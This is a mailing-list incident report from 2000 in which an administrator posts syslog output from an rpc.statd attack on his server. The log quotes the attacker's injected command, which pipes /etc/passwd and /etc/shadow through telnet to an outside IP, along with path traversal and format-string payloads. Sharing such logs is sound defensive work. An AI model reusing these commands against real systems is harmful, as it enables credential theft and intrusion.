Security Incidents mailing list archives
Re: funky syslog entry
From: BPontz () E-DIALOG COM (Brian Pontz)
Date: Thu, 29 Jun 2000 14:21:50 -0400
Since rpc attacks has come up I thought I'd share this attack that happened to me last year. The hacker ended up crashing the server. Brian Oct 5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com Oct 5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon: /../../../tmp/Max.rpc.statd.vulnerability Oct 5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002): request from non-local host Oct 5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to callit(portmapper): request not forwarded Oct 5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^? Oct 5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to callit(portmapper): request not forwarded Oct 5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown host ^?^?^?^? Oct 5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593
/dev/null"
Oct 5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown host -c "sleep 2;sleep 15...skipping... Oct 5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com Oct 5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon:/../../../tmp/Max.rpc.statd.vulnerability Oct 5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002): request from non-local host Oct 5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to callit(portmapper): request not forwarded Oct 5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^? Oct 5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to callit(portmapper): request not forwarded Oct 5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown host ^?^?^?^? Oct 5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593
/dev/null"
Oct 5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown host -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593 >/dev/null" Oct 5 01:36:57 vs1 portmap[5133]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:36:57 vs1 portmap[5134]: connect from 24.5.193.149 to callit(portmapper): request not forwarded Oct 5 01:37:00 vs1 portmap[5135]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:01 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:03 vs1 portmap[5136]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:06 vs1 portmap[5138]: connect from 24.5.193.149 to callit(mountd):request not forwarded Oct 5 01:37:07 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:09 vs1 portmap[5140]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:12 vs1 portmap[5142]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:13 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:15 vs1 portmap[5144]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:18 vs1 portmap[5145]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:20 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:21 vs1 portmap[5146]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:24 vs1 portmap[5147]: connect from 24.5.193.149 to callit(mountd): request not forwarded Oct 5 01:37:26 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:32 vs1 /kernel: pid 5148 (Count.cgi1.2), uid 65534: exited on signal 10 Oct 5 01:37:32 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user. Oct 5 01:37:45 vs1 last message repeated 2 times Oct 5 01:37:59 vs1 sshd[5152]: connect from c992426-f.pinol1.sfba.home.com Oct 5 01:38:05 vs1 sshd[5153]: connect from c992426-f.pinol1.sfba.home.com Oct 5 01:41:40 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "uucp" user. Oct 5 01:42:13 vs1 last message repeated 4 times Oct 5 01:42:37 vs1 last message repeated 3 times Oct 5 01:45:58 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "www" user, whose shell is illegal (/nonexistent). Oct 5 01:46:31 vs1 last message repeated 4 times Oct 5 01:46:53 vs1 last message repeated 3 times Oct 5 01:47:02 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "nobody" user, whose shell is illegal (/nonexistent). Oct 5 01:47:40 vs1 last message repeated 5 times Oct 5 01:47:55 vs1 last message repeated 2 times Oct 5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop Oct 5 02:09:32 vs1 rpc.statd: unmon request from localhost for unknown host cybercop Oct 5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% Oct 5 02:09:33 vs1 rpc.statd: unmon request from %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%% Oct 5 02:42:04 vs1 sshd[5524]: connect from c992426-d.pinol1.sfba.home.com Oct 5 02:53:41 vs1 /kernel: pid 5565, uid 65534: exited on signal -----Original Message----- From: klug [mailto:klug () KLUG CX] Sent: Monday, June 26, 2000 5:44 PM To: INCIDENTS () SECURITYFOCUS COM Subject: funky syslog entry While searching through syslog entries I found this little tid bit. Others and I, believe its some sort of scan. Any ideas are welcome. Portmap has sense been removed from this server. klug Jun 24 14:39:10 * portmap[27279]: connect from 193.40.245.45 to dump(): request from unauthorized host
Current thread:
- Re: funky syslog entry Brian Pontz (Jun 29)